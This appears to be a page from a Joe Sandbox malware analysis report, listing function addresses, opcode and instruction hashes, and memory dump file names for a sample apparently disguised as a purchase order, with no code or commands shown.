Opcode ID: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
Instruction ID: 2220ea822a78533fc5dbf18ef1a220bd55e3c7ba185a4b49131ec362dada97c8
Opcode Fuzzy Hash: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
Instruction Fuzzy Hash: ADD05E36501A40AFC7725F0BEA00D53BBF9FBD5A207050A6EA58587A20C671E802CBA0

Function 0107E588 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction ID: 2fa6c8420348f36a6640fb37dffc71f0b784cf1a3d7818d6f8ef220d6e38d098
Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction Fuzzy Hash: 5AE0EC759516849FDB12DB59C640F9ABBF5BB85B00F190494A6486B6A0D724E900CB40

Function 0103E4BC Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction ID: 346af84bc8b8e89f356ba6c6d3bff1202f65cffd09f8ba666d35331a73887c94
Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction Fuzzy Hash: 77D0A932214650AFC772AA1CFC00FC333E8BB88B31F020499B248CB061C368EC81C684

Function 00FFA093 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction ID: 24efc506b6c8ba94cadff451c4b962ae9840e62bc9b6bce3a29511e1529bde5b
Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction Fuzzy Hash: 13D0223320203093CB382740B910FB37904EF81BA0F1A006C3A0EC3820C8048C42E2E1

Function 0103A750 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction ID: 88d5460f0c89b1cfcee286aa2ece6e8ce588784e5e2726e06487cf61bcb50df1
Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction Fuzzy Hash: 0FD012371D054DBBCB119F65DC41F957BA9F7A5B60F045020B6048B5A0DA3AE950D584

Function 0103C944 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ad6e2ee72d83960801b764c22352b2399b4fe8b11d4682fd7ba75a0631acce8
Instruction ID: cf5240ff820e8a85d7e36478ff04ebd0e34d887ecc118d9cd8e3cd2df08fd21b
Opcode Fuzzy Hash: 6ad6e2ee72d83960801b764c22352b2399b4fe8b11d4682fd7ba75a0631acce8
Instruction Fuzzy Hash: BDD0A730901402CBEFA79B05C708E6D77B8FB19711F01009AE6C1A1811E32ADC01C740

Function 010101C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction ID: 92fb1d5a3e0128783ce9c18c02e90b9e778113c851b2da2435d087cb89c7bb2c
Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction Fuzzy Hash: B0D0C935312D80DFD65BCB0CC894B0533E8BB44B40F8504D0F841CB726D22CD980CA00

Function 0103C620 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
Instruction ID: 2a8660c837d451dc54afcb00634e3a6efd6ab835b4e3ee219434dbde6a491c8a
Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
Instruction Fuzzy Hash: A7C08C33290648AFC722EF98CD41F427BA9FBA8B10F000021F3048B670D635FC20EA88

Function 01020230 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 76da0d27e40a44ff760a4731fac7acdf7f9d9c69115699d2a6a955d122319109
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: D5D0123610024CEFCB05DF40C850D9A7B2AFFD8710F508019FD19076108A31ED62DA50

Function 01000670 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
Instruction ID: 89743f2291e39b9d8248619fb0692a7ee42accf72fdf09336ee74559399f69fb
Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
Instruction Fuzzy Hash: 6CC04C357416418FCF55CB2AC294F4977E4B754750F1508D0EC45CF721D624ED00CA10

Function 010B6A80 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
Instruction ID: 5683703b945435e78a0abc417679c08384e7d6a123fc85dd4859925e197f079e
Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
Instruction Fuzzy Hash: ACC02B1F0152C149CD13CF3503523D0BFA0C7025C0F1C04C1C0C10F113C0140103CA25

Function 010D492D Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
Instruction ID: b1cf956aa78d771ef1033c5c7e252301c69d056ee3ab79808b2e76b7342efe87
Opcode Fuzzy Hash: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
Instruction Fuzzy Hash: EEB01231212546EFD7026764CB40F5832A9BF116C0F0D04B0E64085430DA188810D502

Function 01044260 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ae00d06f36569a17b3b712f8dc0f31e2636d09b55c247880471eff7dd30273
Instruction ID: 384d61401afd438c2c7f9d0ff2b312cd7245a31a43886ceba0041b83ff861663
Opcode Fuzzy Hash: 50ae00d06f36569a17b3b712f8dc0f31e2636d09b55c247880471eff7dd30273
Instruction Fuzzy Hash: CF90023160540022D680715999845574005E7E0301B51C416E8814554CCA2489566361

Function 01044570 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283b9093522e1e3bf933ffe0526d6e7109a306f2a9e3422e5d7fd3e39815da4d
Instruction ID: 999ead24fe4e198d6fd57ace0e61c0c5b75ca81454212711bb52016d6d75b4cb
Opcode Fuzzy Hash: 283b9093522e1e3bf933ffe0526d6e7109a306f2a9e3422e5d7fd3e39815da4d
Instruction Fuzzy Hash: 6A900271601100528680715999044176005E7E1301391C51AA8944560CC6288855A269

Function 010429D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627e1ace60244433217e4b5f6ea0693292285b7f01b0552079d33d9b3d565c7d
Instruction ID: 89efd9ee2dd09761b343e55c00e6cf1a8bff45107f4046326d7f4ac02eed73e1
Opcode Fuzzy Hash: 627e1ace60244433217e4b5f6ea0693292285b7f01b0552079d33d9b3d565c7d
Instruction Fuzzy Hash: 069002B1201140A28A40A259D504B1B4505D7E0201B51C41BE9444560CC5358851A135

Function 010429F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929e080c760642fee39922873ccf5a7369d9a285a5fc719f4dd36cef9e3d49f1
Instruction ID: 68ebd3605802c9a3b8e97e6d070738eedd2901c4d7e82e32d61b8bdf49493f5c
Opcode Fuzzy Hash: 929e080c760642fee39922873ccf5a7369d9a285a5fc719f4dd36cef9e3d49f1
Instruction Fuzzy Hash: D9900435311000134745F55D57045170047D7D5351351C437FD405550CD731CC717131

Function 01042B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ab39772c3f3c0bc67ee3068f5628fb9fbfadd693719ba856ccd43a952641e9
Instruction ID: 81a9e8a1a12636ae466c0db2f5641c918de005391f6d53e5728fc2dfb442d638
Opcode Fuzzy Hash: 11ab39772c3f3c0bc67ee3068f5628fb9fbfadd693719ba856ccd43a952641e9
Instruction Fuzzy Hash: A490023120504852D68071599504A570015D7D0305F51C416A8454694DD6358D55B661

Function 01042B10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd5a0cf0e40dc1e32f379ed4dd3b8504e6c4caf1eb64fd328a77b84f2b6edaca
Instruction ID: 63f384df312b553f1d457774eb35807d991374f8edfb57222d0ce849f52b1d45
Opcode Fuzzy Hash: dd5a0cf0e40dc1e32f379ed4dd3b8504e6c4caf1eb64fd328a77b84f2b6edaca
Instruction Fuzzy Hash: DD90023120100812D6C07159950465B0005D7D1301F91C41AA8415654DCA258A5977A1

Function 01042B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eed5eb8f89e7dc3bd436aab88e9ca3f9e6832d288dde2450a2a77736d807e59
Instruction ID: a51902d97d6d910b371703a7d8dd7080b34f0721a4a5d9c501c5167ef3ea8d42
Opcode Fuzzy Hash: 8eed5eb8f89e7dc3bd436aab88e9ca3f9e6832d288dde2450a2a77736d807e59
Instruction Fuzzy Hash: 0A90023120100852D64061599504B570005D7E0301F51C41BA8514654DC625C8517521

Function 01042BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf95850cc5472701bd097b6b543781dcdcb8e71b536cebf756e1f81e60e4512a
Instruction ID: 19e40a52aa10a8bed1cf14b4bb37aadc37a9b3046aa7053f2758b3ecee6784a5
Opcode Fuzzy Hash: bf95850cc5472701bd097b6b543781dcdcb8e71b536cebf756e1f81e60e4512a
Instruction Fuzzy Hash: 1D90023160500412D6807159A5187170015D7D0201F51D416A8414554DC6698A5576A1

Function 01042A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7fbfcdd95077058739e571dded4fee4b75fd7b2356ec4dba0c580616269e1a
Instruction ID: 054a11623b28350d7dfd218cdba3ed03c01ccb1d74af1cee5d9d5ac49355f142
Opcode Fuzzy Hash: fe7fbfcdd95077058739e571dded4fee4b75fd7b2356ec4dba0c580616269e1a
Instruction Fuzzy Hash: 1F900235221000124685A559570451B0445E7D6351391C41AF9806590CC63188656321

Function 01042AA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f62c700da77e330ffe8a916a198008e612010dbb7c27dfa9d2432aef137b4d68
Instruction ID: 67d89a145957366525659a4b975134befb4ad91c4e0fe50717ddf83663ff01aa
Opcode Fuzzy Hash: f62c700da77e330ffe8a916a198008e612010dbb7c27dfa9d2432aef137b4d68
Instruction Fuzzy Hash: 2E90023120100812D644615999046970005D7D0301F51C416AE414655ED67588917131

Function 01042AC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52eafeb8307176e7b1b7e92d5b857d10c4d8b937528274e9c99879847bbd951a
Instruction ID: c07fab0d5ee069ad1468ca9d424a35be5069221d50a5b8571b4203c5566216b2
Opcode Fuzzy Hash: 52eafeb8307176e7b1b7e92d5b857d10c4d8b937528274e9c99879847bbd951a
Instruction Fuzzy Hash: 0690023160500812D690715995147570005D7D0301F51C416A8414654DC7658A5576A1

Function 01042D50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62c301aa518a587d37feb54c072eba3ba0029845868987dd9b8f1ad250e67d3d
Instruction ID: a7fb1a2d9f34161218bd0ec967676cc29310854fbdbcd78b6752fc48f47e9041
Opcode Fuzzy Hash: 62c301aa518a587d37feb54c072eba3ba0029845868987dd9b8f1ad250e67d3d
Instruction Fuzzy Hash: 3390023130100412D642615995146170009D7D1345F91C417E9814555DC6358953B132

Function 01042DA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae7fc8496699e582e8ed47a625691981c1ed681456871be16cd727a7aa88961
Instruction ID: becc0e003cc6824afb6ef69f26e71d7a17871a005ebd253aedfce971ec9f54c2
Opcode Fuzzy Hash: 6ae7fc8496699e582e8ed47a625691981c1ed681456871be16cd727a7aa88961
Instruction Fuzzy Hash: 5A90023160100512D64171599504627000AD7D0241F91C427A9414555ECA358992B131

Function 01042DC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4742d474a0261c44c30531d1f445543e1b427964263c49ee27e88afcebfd27a4
Instruction ID: b1a95810354d9488e74f71c803a74723953697eb625db367120dcb8ef39e56e6
Opcode Fuzzy Hash: 4742d474a0261c44c30531d1f445543e1b427964263c49ee27e88afcebfd27a4
Instruction Fuzzy Hash: 9C90027120100412D680715995047570005D7D0301F51C416AD454554EC6698DD57665

Function 01042C10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0784bfe276058ddc51588dcca49d3c86d5338926e90c8c9fb927cdc111bb70ab
Instruction ID: 402463ba3ca949ce6806683a4d3038cd22cdffde07ff9c87fb663c0862e15df9
Opcode Fuzzy Hash: 0784bfe276058ddc51588dcca49d3c86d5338926e90c8c9fb927cdc111bb70ab
Instruction Fuzzy Hash: 2790023120100413D6406159A6087170005D7D0201F51D816A8814558DD66688517121

Function 01042C20 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6185eba00d3237deaf829e47425b51295ec976eece990cf145680b4c37c94bd1
Instruction ID: 7fb4e3a2093160802d57e0911baf7aa3f9fb423fe7337641ddd5fa1f4c3710de
Opcode Fuzzy Hash: 6185eba00d3237deaf829e47425b51295ec976eece990cf145680b4c37c94bd1
Instruction Fuzzy Hash: D090023120504452D6406559A508A170005D7D0205F51D416A9454595DC6358851B131

Function 01042C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75942c1717700f6a949489d2e8ed361c908372c582bd638059a64648caedf800
Instruction ID: 1cbe7e929f9625007968b3f85414d22f25b0d07787bdaef1e3dae04e6d57c7f4
Opcode Fuzzy Hash: 75942c1717700f6a949489d2e8ed361c908372c582bd638059a64648caedf800
Instruction Fuzzy Hash: 0E90023921300012D6C07159A50861B0005D7D1202F91D81AA8405558CC92588696321

Function 01042C50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5513a970a20952116619a6d8cbffb651700a7fad2d0dbd271796954a8334c5
Instruction ID: d1f33dea920d2d91132d049cd2f4520c66501c2f827d3abbcab37fa08d1f1c93
Opcode Fuzzy Hash: 2e5513a970a20952116619a6d8cbffb651700a7fad2d0dbd271796954a8334c5
Instruction Fuzzy Hash: E390023130100013D6807159A5186174005E7E1301F51D416E8804554CD92588566222

Function 01042CD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

